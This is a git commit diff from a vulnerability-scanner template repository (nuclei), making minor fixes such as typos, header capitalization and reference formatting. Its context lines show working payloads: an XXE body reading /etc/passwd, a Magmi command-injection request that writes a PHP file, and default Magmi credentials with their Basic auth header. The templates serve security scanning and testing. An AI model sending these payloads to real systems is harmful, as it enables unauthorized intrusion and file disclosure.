Misc (minor)
Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84patch-1
parent
002e8db616
commit
2a320412bf
|
@ -53,7 +53,7 @@ git checkout -b template_branch_name
|
||||||
git add .
|
git add .
|
||||||
```
|
```
|
||||||
|
|
||||||
- To commit give a descriptive message for the convenience of reveiwer by:
|
- To commit, give a descriptive message for the convenience of the reviewer by:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
# This message get associated with all files you have changed
|
# This message get associated with all files you have changed
|
||||||
|
|
|
@ -6,8 +6,9 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||||
tags: cve,cve2017,magmi,xss
|
tags: cve,cve2017,magmi,xss
|
||||||
reference: https://github.com/dweeves/magmi-git/issues/522
|
reference:
|
||||||
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
- https://github.com/dweeves/magmi-git/issues/522
|
||||||
|
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -14,7 +14,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
||||||
headers:
|
headers:
|
||||||
Content-type: "text/xml"
|
Content-Type: "text/xml"
|
||||||
body: |
|
body: |
|
||||||
<!--?xml version="1.0" ?-->
|
<!--?xml version="1.0" ?-->
|
||||||
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
||||||
|
|
|
@ -19,7 +19,7 @@ requests:
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
X-Prototype-Version: 1.5.1.1
|
X-Prototype-Version: 1.5.1.1
|
||||||
Content-type: application/json; charset=UTF-8
|
Content-Type: application/json; charset=UTF-8
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Connection: close
|
Connection: close
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
|
@ -17,14 +17,14 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
|
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||||
- |
|
- |
|
||||||
POST /magmi/web/magmi_run.php HTTP/1.1
|
POST /magmi/web/magmi_run.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
|
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
|
||||||
|
|
|
@ -10,7 +10,7 @@ info:
|
||||||
|
|
||||||
# Response code 503 indicates a potential successful "Too many connections" error
|
# Response code 503 indicates a potential successful "Too many connections" error
|
||||||
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
||||||
# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
|
# with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
|
||||||
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
|
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -23,8 +23,7 @@ requests:
|
||||||
- prom-operator
|
- prom-operator
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
# Added default grafana and prometheus user.
|
# Added default grafana and prometheus user. reference[2]
|
||||||
# Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
|
|
||||||
|
|
||||||
attack: sniper
|
attack: sniper
|
||||||
|
|
||||||
|
|
|
@ -5,6 +5,8 @@ info:
|
||||||
author: TechbrunchFR
|
author: TechbrunchFR
|
||||||
severity: info
|
severity: info
|
||||||
description: Identify Magento
|
description: Identify Magento
|
||||||
|
reference:
|
||||||
|
- https://devdocs.magento.com/guides/v2.4/graphql/
|
||||||
tags: magento
|
tags: magento
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -14,8 +16,7 @@ requests:
|
||||||
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
||||||
|
|
||||||
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
||||||
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
|
# consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]
|
||||||
# https://devdocs.magento.com/guides/v2.4/graphql/
|
|
||||||
|
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue